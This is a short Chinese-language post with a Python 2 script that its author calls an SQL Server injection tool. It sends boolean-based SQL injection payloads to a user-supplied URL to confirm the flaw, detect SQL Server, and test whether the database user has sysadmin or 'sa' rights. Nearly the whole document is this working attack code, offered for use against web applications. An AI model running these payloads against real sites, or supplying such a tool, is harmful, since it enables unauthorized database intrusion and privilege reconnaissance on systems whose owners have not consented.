無聊的時候,用Python寫的一個小程序,用有注入點的鏈接,檢測當前數據庫用戶是否為sa,沒什麼技術含量。
# Code by zhaoxiaobu Email: [email protected]
- #-*- coding: UTF-8 -*-
- from sys import exit
- from urllib import urlopen
- from string import join,strip
- from re import search
- def is_sqlable():
- sql1="%20and%201=2"
- sql2="%20and%201=1"
- urlfile1=urlopen(url+sql1)
- urlfile2=urlopen(url+sql2)
- htmlcodes1=urlfile1.read()
- htmlcodes2=urlfile2.read()
- if not search(judge,htmlcodes1) and search(judge,htmlcodes2):
- print "[信息]恭喜!這個URL是有注入漏洞的!n"
- print "[信息]現在判斷數據庫是否是SQL Server,請耐心等候....."
- is_SQLServer()
- else:
- print "[錯誤]你確定這個URL能用?換個別的試試吧!n"
- def is_SQLServer():
- sql = "%20and%20exists%20(select%20*%20from%20sysobjects)"
- urlfile=urlopen(url+sql)
- htmlcodes=urlfile.read()
- if not search(judge,htmlcodes):
- print "[錯誤]數據庫好像不是SQL Server的!n"
- else:
- print "[信息]確認是SQL Server數據庫!n"
- print "[信息]開始檢測當前數據庫用戶權限,請耐心等待......"
- is_sysadmin()
- def is_sysadmin():
- sql = "%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))"
- urlfile = urlopen(url+sql)
- htmlcodes = urlfile.read()
- if not search(judge,htmlcodes):
- print "[錯誤]當前數據庫用戶不具有sysadmin權限!n"
- else:
- print "[信息]當前數據庫用戶具有sysadmin權限!n"
- print "[信息]檢測當前用戶是不是SA,請耐心等待......"
- is_sa()
- def is_sa():
- sql = "%20and%20'sa'=(select%20System_user)";
- urlfile = urlopen(url+sql)
- htmlcodes = urlfile.read()
- if not search(judge,htmlcodes):
- print "[錯誤]當前數據庫用戶不是SA!n"
- else:
- print "[信息]當前數據庫用戶是SA!n"
- print "n########################################################################n"
- print " ^o^SQL Server注入利用工具^o^ "
- print " Email: [email protected]"
- print "========================================================================";
- url = raw_input('[信息]請輸入一個可能有注入漏洞的鏈接!nURL:')
- if url == '':
- print "[錯誤]提供的URL必須具有 '.asp?xxx=' 這樣的格式"
- exit(1)
- judge = raw_input("[信息]請提供一個判斷字符串.n判斷字符串:")
- if judge == '':
- print "[錯誤]判斷字符串不能為空!"
- exit(1)
- is_sqlable()
